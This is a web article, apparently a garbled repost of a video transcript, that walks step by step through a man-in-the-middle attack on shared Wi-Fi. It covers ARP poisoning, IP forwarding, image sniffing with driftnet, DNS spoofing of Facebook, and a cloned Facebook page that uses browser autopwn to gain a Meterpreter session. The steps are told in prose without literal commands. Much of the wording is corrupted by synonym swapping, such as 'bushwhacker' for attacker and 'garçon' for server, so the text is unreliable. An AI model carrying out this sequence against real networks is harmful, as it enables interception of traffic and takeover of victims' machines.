Man-in-the-middle attack: Real-life example and video walkthrough by Blackhat 2023
Is your entanglement browsing inside, or is a guy in the medium appearing at everything you serve? Learn what a Man-in-the-middle ( MITM) attack is, how to set up and execute one, and why they’re so dangerous in this walkthrough from Infosec Chops author Keatron Evans.
Man-in-the-middle attack example
In this occasion of Cyber Work Applied, Keatron demonstrates a man- in- the- middle attack real- life illustration an innocent victim joins the same Wi- Fi network as a vicious bushwhacker. Once the victim joins, it only takes a many way for Keatron to fully compromise the machine using MITM attack tools.
Man-in-the-middle attack walkthrough
The edited transcript of the MITM attack is provide below, separated into each step Keatron goes through .
How does man-in-the-middle attack work?
Hi, I ’m covering to show off you how to serve a man- in- the- middle attack.What we feel on the movie is one of the casualties that we ’re covering to be going a man- in- the- middle charge against. Now, one of the effects we need to flash back is any time you visit a website, you do so by going out to a router or a gateway or commodity to get you to the internet. You primarily find the websites you ’re trying to visit by doing commodity called a DNS query, which is when you tell your DNS garçon to go to the IP speech of wherever you ’re testing to stay.
We ’re going to be interposing that process — putting ourselves in the middle — so that when the victim requests Facebook or whatever it’s they ’re trying to get to, we can lie to them and narrate them Facebook is next to we demand it to be. naturally, we can point them to our point that we control rather of them getting to the real Facebook.
Related article:5 popular wireless hacking tools by Blackhat Pakistan [updated 2023]
ARP spoofing man-in-the-middle attack
Let’s dive right into it. The first thing we’ve to do is tell the victim, which is this machine, that we ’re the gateway, which is.2. That way it’ll pass all those requests through us. The easy way to do that’s commodity called ARP poisoning. So let me ARP bane.
I ’m going to specifically tell the gateway, which is.2, that I’m the victim, which is 100. Now, flash back you ’re in the middle, or you ’re trying to get in the middle, so you ca n’t just ARP bane one side of that equation. You have the ARP bane both. So contemporaneously I ’m going to ARP bane and tell the gateway that I’m the gateway, which if you ’re at home or at Starbucks would basically be your Wi- Fi router we ’re spoofing then.
So first ARP caricature, I ’m telling the gateway that I ’m the victim. The alternate ARP caricature, I ’m telling the victim that I ’m the gateway. This is part of what puts me in the middle. Both sides will now suppose I ’m the other side. So I start my ARP bane and right down you can see the ARP going out and it’s doing a reply, which is telling the 100 machine that I ’m the gateway. And it’s also narrating the key that I ’m the 100 motor. So that’s the ARP poisoning in stir. And it’s going every second. The reason it’s going every second is because in a real network, every formerly in awhile, the real machines would respond and say, stay a nanosecond, I ’ve got that IP address. So having this ARP be every alternate guarantees that indeed if the real device responds, you incontinently overwrite that response with your more recent response — because in the land of ARP the most recent reply is considered to be the verity.
Turn on IP forwarding to complete the setup
The last step, once we ’ve got the ARP bane going, is we’ve to make sure we turn on commodity called IP encouraging. The reason for that’s by dereliction your machine will simply drop packets. Now, in my case, my machine has the IP forwarding turned off, which means it’s going to follow that geste.
What I want to do is change that geste because I’m going to be getting packets that are intended for our victim then. Since those packets are n’t actually intended for me, my dereliction geste is to simply drop those packets. But I do n’t want to drop them. I want to do earlier and hold them and reach them on. So I ’m going to change this IP forward from a value of zero to — guess what? If zero is out, what do you suppose I need to change it to in order to turn it on? Exactly. One.
So I ’m simply going to write the number one into this train, and this will actually turn on IP encouraging. To prove this is working, I ’m not going to write this yet. I ’m going to show you that presently 100, which is this victim, has trouble reverberating.2, That’s because the clunk packet is noway making it to the factual gateway. It’s coming to my machine, and since my dereliction geste is to drop packets not meant for me, and I ’m easily not.2, that packet’s getting dropped.
But the nanosecond I turn on IP forwarding — let’s go ahead and turn that on — now you ’re going to see those tangs are going to end up being a 100 percent successful. That’s because now the clunk is making it to the other side, but it’s only making it there by coming through my interface first. So that means I ’ve made myself a deputy or now I ’ve completed and put myself in the middle.
Stealing victim images using Kali Linux driftnet tool
How do we establish that we ’re in the medium? How can we do effects? Well, there are a few of devices I need to display you. The first one is a unique idea sniffer called Driftnet. The Kali Linux driftnet device is special in that it grabs just icons out of a fatality’s business. So if I run Driftnet and tell it to hear on interface six then, you ’ll see them in this little black window whenever the victim visits websites.
Let’s go do that. The victim goes out. It goes to MSN and some distinct points. Well, in that business are images, and guess what the bushwhacker just seized? All of the images that were in that business have now been scented off by this bushwhacker in the middle. So any images you would have viewed during your cybersurfer session, the bushwhacker is suitable to see those images now. Not only see them, but if I set up one that I wanted to keep like this image then with this nice pie, I click that and it actually saves a original dupe of that image so I can view it latterly. currently, if that’s not weird sufficiently, allow me display you how this truly gets profound.
Setting up DNS cache poisoning
On top of the man in the middle and on top of the ARP poisoning, I ’m going to do one further thing called DNS cache poisoning. Whenever you go to a website similar as Facebook, the first thing that happens is your machine sends a query to your DNS garçon saying, where is Facebook? What’s Facebook’s IP? Your DNS garçon responds back and says, then’s the IP address for Facebook.
Now, since I ’m formerly in the middle, I ’m going to see that request. I ’m going to respond on behalf of the factual DNS garçon and lie to you and tell you that Facebook is at my machine. Let’s look at how easy that is. First I ’m going to produce a train. We ’ll exactly call this MITM FB, and I ’m coursing to state in there that Facebook is at my IP, which is 204. I ’ll save that little textbook train. Now, I ’m going to run the tool dnsspoof and point to that train that we just created. What’s going down
is any moment this device sees a doubt for Facebook, it’s crossing to react to that motor that’s questioning for Facebook and lie to it and chart it that Facebook is at my IP.
Let’s buzz correspond the prey and feel what happens. So victim says let’s clunkfacebook.com, and it gets tangs. But look at where it says the tangs are coming from 204. therefore we ’ve successfully touched the ARP store. We ’ve successfully DNS cache poisoned them. They ca n’t indeed DNS lookup Facebook without blindly trusting what we ’re telling it Facebook is.
Use Social Engineering Toolkit to clone website
For the last step, I ’m going to use the Kali Social Engineering Toolkit on Facebook. I need to make sure I’ve a nice clean dupe of Facebook that looks just like Facebook, but actually has vicious law in it that will give me control of that victim’s machine if they browse it. This is also known as a customer- side attack against a cybersurfer that we ’re going to use to do the factual exploit. It sounds complex, but let me show you how simple it actually is.
I ’m going to load up a tool that’s been around for a lot of times, written by Dave Kennedy. Let me show you how to use the Social Engineering Toolkit in Kali Linux. I ’m going to pick one for social engineering, two for website attack vectors, and two, again, for cybersurfer exploit system. also I ’m going to go to point cloner and say no to natting. For IP, I wanted to come back to that. It’s going to be mine.
Who do I want to reduplicate? Let’s just say Facebook. And also I ’m going to use cybersurfer autopwn because these hundreds of exploits then are principally depending on me knowing which cybersurfer victim’s use. It could be different cybersurfer and zilches combinations, so I ’m going to pick autopwn, which means that when the victim hits my fake Facebook garçon, the garçon is going to look at that victim’s progeny request and decrypt what the cybersurfer and zilches is, and also shoot the applicable exploit grounded on that. Alright, I ’m going to pick Meterpreter as my cargo. In other words, if I ’m suitable to export the machine, what do you want to get as your spoil? I need a Meterpreter session so that I can clasp over the motor. . Let the harborage stay 443, and now it’s off to the races. It’s going out.
It’s going to the dereliction Facebook login runner. As you can see there, it’s cloning that, which means it’s copying it down. Now it’s putting the vicious law that I ’ve drafted inside that fake Facebook dupe. And now it’s standing up a interpretation of the exploit for every possible cybersurfer and operating system combination and storing them at a slightly different URL on my garçon. So when your cybersurfer hits this garçon, it’s going to look at your cybersurfer interpretation, look at your zilches interpretation, and also simply shoot the applicable exploit grounded on that, which we ’re loading them each right then.
Once this is finished, the only thing we’ve left to do is go play victim and see what happens when the victim simply does what the victim does everyday — tries to go to Facebook. So we go to the victim. We open our cybersurfer. We loadfacebook.com in their cybersurfer, and at that point right there, it’s game over. Let’s go back and look. What you see passing on the bushwhacker side is the bushwhacker now has a session. We connect to that session as the bushwhacker, and take our obligatory screenshot then to prove that we’ve it.
At that point we enjoy that machine. It belongs to us fully. It’s no longer that victim’s. It’s ours. We can drop into a shell, and it’s game over at that point. And that folks is what a man- in- the- middle- attack looks like. Now you can see the factual desolation that can come from that.